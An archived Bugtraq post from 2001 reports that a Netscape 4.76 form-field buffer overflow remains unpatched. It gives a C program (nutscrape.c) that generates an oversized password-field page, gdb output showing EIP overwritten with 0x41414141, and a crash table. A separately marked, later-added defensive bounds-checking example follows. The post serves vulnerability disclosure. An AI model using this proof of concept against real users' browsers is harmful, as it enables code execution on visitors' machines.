Bugtraq mailing list archives

Buffer Overflow still exists in Netscape <= 4.76


From: fish stiqz <fish () ANALOG ORG>
Date: Tue, 16 Jan 2001 00:19:43 -0500

Hello.

I have noticed that the buffer overflow discovered by Michal Zalewski
and covered extensively by the different unix distributions is still
present in netscape 4.76 even though they claim it is not.

Refer to these links for background information:
http://security-archive.merton.ox.ac.uk/bugtraq-200011/0099.html
http://security-archive.merton.ox.ac.uk/bugtraq-200011/0426.html
http://www.redhat.com/support/errata/RHSA-2000-109.html

All of the above advisories (and all that I've seen) state that netscape
versions up to and including 4.75 are vulnerable, not 4.76.  I have
caused netscape 4.76 on both redhat 6.2 and slackware-current to segfault.
Below is the proof of the pudding:

On slackware-current (netscape.tgz):

 $ ./nutscrape 20000 > crash_me.html
 $ netscape -v
 Netscape 4.76/U.S., 06-Oct-00; (c) 1995-2000 Netscape Communications Corp.
 $ gdb /usr/bin/netscape
 GNU gdb 5.0
 Copyright 2000 Free Software Foundation, Inc.
 GDB is free software, covered by the GNU General Public License, and you are
 welcome to change it and/or distribute copies of it under certain conditions.
 Type "show copying" to see the conditions.
 There is absolutely no warranty for GDB.  Type "show warranty" for details.
 This GDB was configured as "i386-slackware-linux"...
 (no debugging symbols found)...
 (gdb) set args http://fish.analog.org/~fish/crash_me.html
 (gdb) run
 Starting program: /usr/bin/netscape
 http://fish.analog.org/~fish/crash_me.html
 warning: Unable to find dynamic linker breakpoint function.
 GDB will be unable to debug shared library initializers
 and track explicitly loaded dynamic code.
 (no debugging symbols found)...(no debugging symbols found)...
 (no debugging symbols found)...(no debugging symbols found)...
 (no debugging symbols found)...(no debugging symbols found)...
 (no debugging symbols found)...(no debugging symbols found)...
 (no debugging symbols found)...(no debugging symbols found)...
 (no debugging symbols found)...(no debugging symbols found)...
 (no debugging symbols found)...
 Program received signal SIGSEGV, Segmentation fault.
 0x41414141 in ?? ()
 (gdb) info all-registers
 eax            0x41414141       1094795585
 ecx            0xbfffd904       -1073751804
 edx            0x91c1c00        152837120
 ebx            0x175a2c 1530412
 esp            0xbfffd83c       0xbfffd83c
 ebp            0xbfffd864       0xbfffd864
 esi            0x0      0
 edi            0x921eb8c        153217932
 eip            0x41414141       0x41414141
 eflags         0x10246  66118
<snip>


On Redhat 6.2 (netscape-communicator-4.76-0.6.2.i386.rpm):

 $ cat /etc/redhat-release
 Red Hat Linux release 6.2 (Zoot)
 $ netscape -v
 Netscape 4.76/U.S., 06-Oct-00; (c) 1995-2000 Netscape Communications Corp.
 $ rpm -qa |grep netscape
 netscape-communicator-4.76-0.6.2
 netscape-common-4.76-0.6.2
 $ gdb /usr/lib/netscape/netscape-communicator
 GNU gdb 19991004
 Copyright 1998 Free Software Foundation, Inc.
 GDB is free software, covered by the GNU General Public License, and you are
 welcome to change it and/or distribute copies of it under certain conditions.
 Type "show copying" to see the conditions.
 There is absolutely no warranty for GDB.  Type "show warranty" for details.
 This GDB was configured as "i386-redhat-linux"...
 (no debugging symbols found)...
 (gdb) run http://fish.analog.org/~fish/crash_me.html
 Starting program: /usr/lib/netscape/netscape-communicator
 http://fish.analog.org/~fish/crash_me.html

 Program received signal SIGSEGV, Segmentation fault.
 0x41414141 in ?? ()Cannot access memory at address 0x7f0000
 (gdb) info all-registers
 eax            0x41414141       1094795585
 ecx            0xbfffdd14       -1073750764
 edx            0x9268200        153518592
 ebx            0x40064a2c       1074154028
 esp            0xbfffdc4c       -1073750964
 ebp            0xbfffdc74       -1073750924
 esi            0x0      0
 edi            0x92624ec        153494764
 eip            0x41414141       1094795585
 eflags         0x10246  66118
<snip>

So we see here that our eip is now 0x41414141.  This is obviously bad.
Windows versions seem to not be vulnerable, although I have only tested
this on versions 4.08 and 4.61.

If this vulnerability is exploited, an attacker could gain entrance to
potentially any computer running vulnerable versions of netscape that
visits his website.  To test if you are vulnerable, point your browser to
http://fish.analog.org/~fish/crash_netscape.html (15,000 A's) or
http://fish.analog.org/~fish/crash_netscape2.html (100,000 A's)

My Findings: (you may have to hit reload before the browser will crash):

Number of A's | Result
-------------------------------------------------------
1000            Nothing.
2000            Nothing.
5000            Memory corruption (check view source and you may see this)
7000            Continued corruption.
10000           SIGSEGV in PR_HashTableRawLookup ()
15000           SIGSEGV in _MD_GetArchitecture ()
= 20000        SIGSEGV in XFE_GetFormElementInfo ()
                And, sometimes eip overwrite.
-------------------------------------------------------

nutscrape.c is a very trivial program that generates a big html form
value in an input field, which causes the overflow.

 /*
  * nutscrape.c - fish stiqz <fish () analog org>
  * Trivial overflow in netscape.
  */

 #include <stdio.h>
 #include <stdlib.h>

 #define OVERFLOW_BYTE 0x41

 void usage(char *p)
 {
         fprintf(stderr, "usage: %s <num of %c's>\n", p, OVERFLOW_BYTE);
         exit(EXIT_FAILURE);
 }

 int main(int argc, char **argv)
 {
         int i, t;

         if(argc != 2)
                 usage(argv[0]);

         t = atoi(argv[1]);

         printf("<html>\n\n<head>\n<title>Test of Netscape</title>\n"
                "</head>\n\n<body>\n\n\n<form action=foo method=bar>\n"
                "<input type=password value=");

         for(i = 0; i < t; i++)
                 putc(OVERFLOW_BYTE, stdout);


         printf(">\nmore form tags\n</form>\n\n\n</body>\n</html>\n");

         return EXIT_SUCCESS;
 }



So, in summary, if you upgraded to netscape 4.76 to fix the buffer
overflow problem, then you upgraded in vain; the problem most
definitely still exists.

Hope you all have a good day.
- fish stiqz


shoutouts to nerile.
#TelcoNinjas suck.

--
+---------------------------------------------------------------------------+
|  fish stiqz <fish () analog org>    <*)))-<     ** yum, yum, delicious **    |
+---------------------------------------------------------------------------+
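Added example, not part of fish stiqz's post and not Netscape's code: the post shows a form field value of tens of thousands of bytes overwriting eip with 0x41414141, which is the signature of an unchecked copy into a fixed-size buffer. The snippet below is a hypothetical, defender-side version of that step: a toy parser that pulls the unquoted `value=` attribute out of an `<input>` tag, as nutscrape.c emits it, and refuses any value that does not fit its buffer instead of copying it blindly. `FIELD_MAX`, `copy_field_value`, `find_value_attr`, `parse_input_tag`, `build_nutscrape_tag` and `check_nutscrape_size` are names chosen for this example; nothing here reflects how Netscape actually parsed forms.

```c
/* Added example: bounds-checked handling of an HTML form field value.
 * Assumption (not confirmed by the post): the Netscape bug is an unchecked
 * copy of the value= text into a fixed buffer. Names here are invented. */
#include <stdio.h>
#include <string.h>
#include <stddef.h>

#define FIELD_MAX 256   /* hypothetical capacity of a form field buffer */

/* Result codes returned by the copy and parse helpers. */
enum field_status { FIELD_OK = 0, FIELD_TOO_LONG = 1, FIELD_BAD_ARGS = 2 };

/* Copy src_len bytes of `src` (not necessarily NUL-terminated) into `dst`
 * of capacity `dst_cap`. Oversize input is rejected, not silently truncated,
 * so the caller can log or refuse it; `dst` is always left terminated. */
enum field_status copy_field_value(char *dst, size_t dst_cap,
                                   const char *src, size_t src_len)
{
    if (dst == NULL || src == NULL || dst_cap == 0)
        return FIELD_BAD_ARGS;
    if (src_len >= dst_cap) {          /* keep one byte for the terminator */
        dst[0] = '\0';
        return FIELD_TOO_LONG;
    }
    memcpy(dst, src, src_len);
    dst[src_len] = '\0';
    return FIELD_OK;
}

/* Toy attribute scanner: returns the length of the unquoted text after
 * "value=" up to the next '>' or whitespace and sets *start to it, or
 * returns 0 with *start == NULL when the tag has no value attribute. */
size_t find_value_attr(const char *tag, const char **start)
{
    const char *p = strstr(tag, "value=");
    if (p == NULL) { *start = NULL; return 0; }
    p += strlen("value=");
    const char *q = p;
    while (*q != '\0' && *q != '>' && *q != ' ' && *q != '\n' && *q != '\t')
        q++;
    *start = p;
    return (size_t)(q - p);
}

/* Parse one <input> tag and store its value in a caller-supplied buffer. */
enum field_status parse_input_tag(const char *tag, char *out, size_t out_cap)
{
    const char *start;
    size_t len = find_value_attr(tag, &start);
    if (start == NULL) {               /* no value attribute: empty field */
        if (out_cap) out[0] = '\0';
        return FIELD_OK;
    }
    return copy_field_value(out, out_cap, start, len);
}

/* Build a tag shaped like nutscrape.c's output with n 'A's (constructed test
 * input). Returns the tag length, or 0 if it does not fit in `buf`. */
size_t build_nutscrape_tag(char *buf, size_t cap, size_t n)
{
    const char *head = "<input type=password value=";
    size_t head_len = strlen(head);
    size_t need = head_len + n + 2;    /* '>' plus NUL */
    if (need > cap) return 0;
    memcpy(buf, head, head_len);
    memset(buf + head_len, 'A', n);
    buf[head_len + n] = '>';
    buf[head_len + n + 1] = '\0';
    return need - 1;
}

/* Feed a constructed n-'A' tag through the checked parser. Returns the
 * field_status, or -1 if the test tag itself could not be built. */
int check_nutscrape_size(size_t n)
{
    static char tag[65536];
    char field[FIELD_MAX];
    if (build_nutscrape_tag(tag, sizeof tag, n) == 0) return -1;
    return (int)parse_input_tag(tag, field, sizeof field);
}

int main(void)
{
    /* The sizes from the post's findings table. */
    size_t sizes[] = { 1000, 2000, 5000, 7000, 10000, 15000, 20000 };
    for (size_t i = 0; i < sizeof sizes / sizeof sizes[0]; i++) {
        int st = check_nutscrape_size(sizes[i]);
        printf("%zu A's: %s\n", sizes[i],
               st == FIELD_OK ? "accepted" : "rejected (too long)");
    }
    return 0;
}
```

With the check in place every size in the post's table is rejected before a byte reaches the fixed buffer; the value is stored only when it is shorter than `FIELD_MAX`, which is the property a fix for this class of bug has to guarantee regardless of how the rest of the parser is written.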

